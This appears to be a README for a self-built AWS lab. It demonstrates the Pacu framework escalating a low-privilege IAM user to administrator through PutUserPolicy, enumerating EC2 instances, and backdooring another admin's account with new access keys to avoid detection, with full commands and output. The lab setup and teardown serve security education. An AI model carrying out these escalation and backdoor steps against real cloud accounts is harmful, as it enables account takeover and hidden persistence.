I put together some CloudFormation scripts that support a Pacu demonstration video I found:
https://www.youtube.com/watch?v=FDhhE52a7yE
- AWS CLI
- Pick a region to run from
I prefer to run two tabs, so I'll indicate which tab for each step.
- Tab 1: Launch both Cloudformation stacks to create users and infrastructure
(continue to next step while this runs in background)
aws cloudformation create-stack --stack-name PacuUsers --template-body file://iam.yaml --capabilities CAPABILITY_NAMED_IAM
aws cloudformation create-stack --stack-name PacuInfrastructure --template-body file://ec2.yaml
- Tab 2: Install Pacu
- Tab 2: Start Pacu
- Tab 1: Get the access key and secret created by Cloudformation
(Step 1 needs to be complete before you can run this)
aws cloudformation describe-stacks --stack-name PacuUsers --query 'Stacks[0].Outputs'
- Tab 2: Configure Pacu with output access key and secret using the 'set_keys' command
Pacu (demo:No Keys Set) > set_keys
Setting AWS Keys...
Press enter to keep the value currently stored.
Enter the letter C to clear the value, rather than set it.
If you enter an existing key_alias, that key's fields will be updated instead of added.
Key alias []: careless
Access key ID []: ********************
Secret access key []: ****************************************
Session token (Optional - for temp AWS keys only) [None]:
Keys saved to database.
- Tab 2: Set the region you'd like to run in using the 'set_regions' command. By not setting this you will default to executing commands across resources in all regions.
Pacu (demo:careless) > set_regions us-east-1
Session regions changed: ['us-east-1']
- Tab 2: Right now you're running a careless user who has a few IAM permissions and nothing else. Don't believe me? Check it out. If we try to get EC2 details using the 'ec2__enum' command, it will fail.
Pacu (demo:careless) > run ec2__enum --instances
Running module ec2__enum...
[ec2__enum] Starting region us-east-1...
[ec2__enum] FAILURE:
[ec2__enum] Access denied to DescribeInstances.
[ec2__enum] Skipping instance enumeration...
[ec2__enum] 0 instance(s) found.
[ec2__enum] No data successfully enumerated.
- Tab 2: Let's see if our careless user has any permissions to escalate our privileges using the 'iam__privsec_scan' command.
Pacu (demo:careless) > run iam__privesc_scan
Running module iam__privesc_scan...
[iam__privesc_scan] Escalation methods for current user:
[iam__privesc_scan] CONFIRMED: PutUserPolicy
[iam__privesc_scan] Attempting confirmed privilege escalation methods...
[iam__privesc_scan] Starting method PutUserPolicy...
[iam__privesc_scan] Trying to add an administrator policy to the current user...
[iam__privesc_scan] Successfully added an inline policy named jyfptpd8pg! You should now have administrator permissions.
[iam__privesc_scan] iam__privesc_scan completed.
[iam__privesc_scan] MODULE SUMMARY:
Privilege escalation was successful
Whoa! I can haz admin! 9. Tab 2: run ec2__enum --instances
Pacu (demo:careless) > run ec2__enum --instances
Running module ec2__enum...
[ec2__enum] Starting region us-east-1...
[ec2__enum] 2 instance(s) found.
[ec2__enum] ec2__enum completed.
[ec2__enum] MODULE SUMMARY:
Regions:
us-east-1
2 total instance(s) found.
- Tab 2: Before we do anything else, let's create some credentials on another account so we don't sound the alarms. Let's try to find someone that should be producing activity using the 'iam__backdoor_users_keys' command.
Pacu (demo:careless) > run iam__backdoor_users_keys
Running module iam__backdoor_users_keys...
[iam__backdoor_users_keys] Data (IAM > Users) not found, run module "iam__enum_users_roles_policies_groups" to fetch it? (y/n) y
[iam__backdoor_users_keys] Running module iam__enum_users_roles_policies_groups...
[iam__enum_users_roles_policies_groups] Found 4 users
[iam__enum_users_roles_policies_groups] iam__enum_users_roles_policies_groups completed.
[iam__enum_users_roles_policies_groups] MODULE SUMMARY:
4 Users Enumerated
IAM resources saved in Pacu database.
[iam__backdoor_users_keys] Backdoor the following users?
[iam__backdoor_users_keys] ***** (y/n)? n
[iam__backdoor_users_keys] Careless (y/n)? n
[iam__backdoor_users_keys] ***** (y/n)? n
[iam__backdoor_users_keys] UnsuspectingAdmin (y/n)? y
[iam__backdoor_users_keys] Access Key ID: ********************
[iam__backdoor_users_keys] Secret Key: ****************************************
[iam__backdoor_users_keys] iam__backdoor_users_keys completed.
[iam__backdoor_users_keys] MODULE SUMMARY:
1 user key(s) successfully backdoored.
Sweet! We found UnsuspectingAdmin and generated new keys on his/her account.
From here we can do whatever we want within whatever tool we want. This goes to show, keep those access keys and secrets SECRET!
Remove the non-CloudFormation managed in-line policy:
aws iam list-user-policies --user-name Careless --query 'PolicyNames[0]' --output text | xargs -I {} aws iam delete-user-policy --user-name Careless --policy-name {}
Tear down CloudFormation stacks:
aws cloudformation delete-stack --stack-name PacuUsers
aws cloudformation delete-stack --stack-name PacuInfrastructure